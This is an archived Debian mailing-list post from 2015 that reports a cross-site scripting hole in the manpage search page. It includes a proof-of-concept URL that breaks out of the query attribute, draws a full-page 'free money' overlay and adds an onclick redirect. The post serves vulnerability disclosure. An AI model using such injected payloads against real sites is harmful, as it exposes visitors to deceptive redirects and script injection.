XSS in Manpage Search

To: debian-www@lists.debian.org
Subject: XSS in Manpage Search
From: Gary McAdam <gpmcadam@gmail.com>
Date: Fri, 17 Jul 2015 21:38:51 +0100
Message-id: <[🔎] 0F4B1F99-DD3E-435A-99CF-CD6C4863DF6D@googlemail.com>

Hi,

I found an XSS vulnerability on the manage search page.

http://manpages.debian.org/cgi-bin/man.cgi?query=Click%20Here%20for%20Free%20Money%22%20style=%22width:100%;height:100%;cursor:pointer;z-index:10000;font-size:100px;text-align:center;border:1px%20solid%20lightgray;border-radius:5px;%22%20onclick=%22window.location=%27http://www.reddit.com/r/xss%27;%22%20%22

Kind regards,

Gary

Reply to:

Follow-Ups:
- Re: XSS in Manpage Search
  - From: Javier Fernandez-Sanguino <jfs@computer.org>

Prev by Date: Re: /devel/people duplicate entry due to typo - attempted patch
Next by Date: website for jessie release notes is wrong.
Previous by thread: Re: /devel/people duplicate entry due to typo - attempted patch
Next by thread: Re: XSS in Manpage Search
Index(es):
- Date
- Thread